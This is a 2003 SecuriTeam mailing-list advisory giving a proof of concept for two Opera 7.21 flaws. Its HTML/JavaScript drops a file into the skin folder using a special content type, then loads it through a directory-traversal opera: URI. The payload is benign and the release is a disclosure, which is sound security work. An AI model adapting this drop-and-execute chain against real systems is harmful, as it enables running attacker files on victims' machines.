[EXPL] Opera Skinned and Opera Directory Traversal (Exploit)

From: SecuriTeam (support_at_securiteam.com)
Date: 11/19/03

  • Next message: SecuriTeam: "[TOOL] tcpstatflow - Covert Tunnel Detector" 
    To: list@securiteam.com
Date: 19 Nov 2003 19:40:56 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Opera Skinned and Opera Directory Traversal (Exploit)
    ------------------------------------------------------------------------

    SUMMARY

    While installing Opera, if the "USE SEPARATE SETTINGS FOR EACH USER"
    option is selected, the "opera7/profile" folder is stored in the
    "<username>/application data/opera7" location instead of in the Opera root
    folder. The "profile" folder contains user specific data for different
    Opera users. Therefore, each user has a different "profile" folder in his
    "<username>/application data/opera7" folder.

    Folders of interest to us in which configuration files are automatically
    downloaded and stored (like skin, toolbar, mouse, etc.) are subfolders of
    the "profile" folder and hence are also moved to this location.

    In this scenario, the arbitrary files can still be dropped in the
    respective folders. However, for executing the files, the <username>
    variable must be known. Other methods of exploiting this scenario may come
    up later.

    DETAILS

    Vulnerable systems:
     * Opera version 7.21 and prior

    Immune systems:
     * Opera version 7.22

    Exploit:
    This is a simple proof of concept for the two Opera vulnerabilities
    detailed in the "
    <http://www.securiteam.com/windowsntfocus/6V00I2K8UQ.html> Opera Skinned :
    Arbitrary File Dropping And Execution" and "
    <http://www.securiteam.com/windowsntfocus/6U00H2K8UY.html> Opera Web
    Browser Directory Traversal in Internal URI Protocol" advisories.

    "main.htm" is the file which is to be loaded into the browser remotely.
    This file opens "skin.htm" in a new window. The Content-Type of "skin.htm"
    should be set as "application/x-opera-skin" on the server. When skin.htm
    is opened in this way, it is dropped in the "/profile/skin/" folder on the
    victim's machine. This demonstrates the first vulnerability.

    After dropping skin.htm, main.htm is redirected to the local skin.htm. The
    path of skin.htm is calculated using the second vulnerability. This
    demonstrates the second vulnerability.

    NOTE: Don't forget to set the Content-Type as "application/x-opera-skin"
    for skin.htm.

    ---------------START MAIN.HTM----------------
    < html>
    < head>
    < script language="javascript">
    var win=open("skin.htm") // The server should return content-type as //
    "application/x-opera-skin" for "Skin.htm". "Skin.htm" will be dropped in
    the "<opera // dir>/profile/skin/" folder.
    setTimeout("redir()",2000) //modify according to your situation.
    function redir(){
    window.location.href="opera:/help/..%5c/profile/skin/skin.htm" //This uses
    the // directory traversal flaw mentioned in advisory 2 to get the path of
    the dropped file. In this // case, it is skin.htm.
    }
    </script>
    </head>
    < body>
    < h1>This is the main file</h1>
    </body>
    </html>
    ---------------END MAIN.HTM----------------

    ---------------START SKIN.HTM----------------
    < body>
    < h1> Opera Skinned!!! </h1>< p>This is Skin.htm from "<opera
    dir>/profile/skin/" in localhost.
    </body>
    ---------------END SKIN.HTM----------------

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:sgmasood@yahoo.com> S G
    Masood.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[TOOL] tcpstatflow - Covert Tunnel Detector"

    Relevant Pages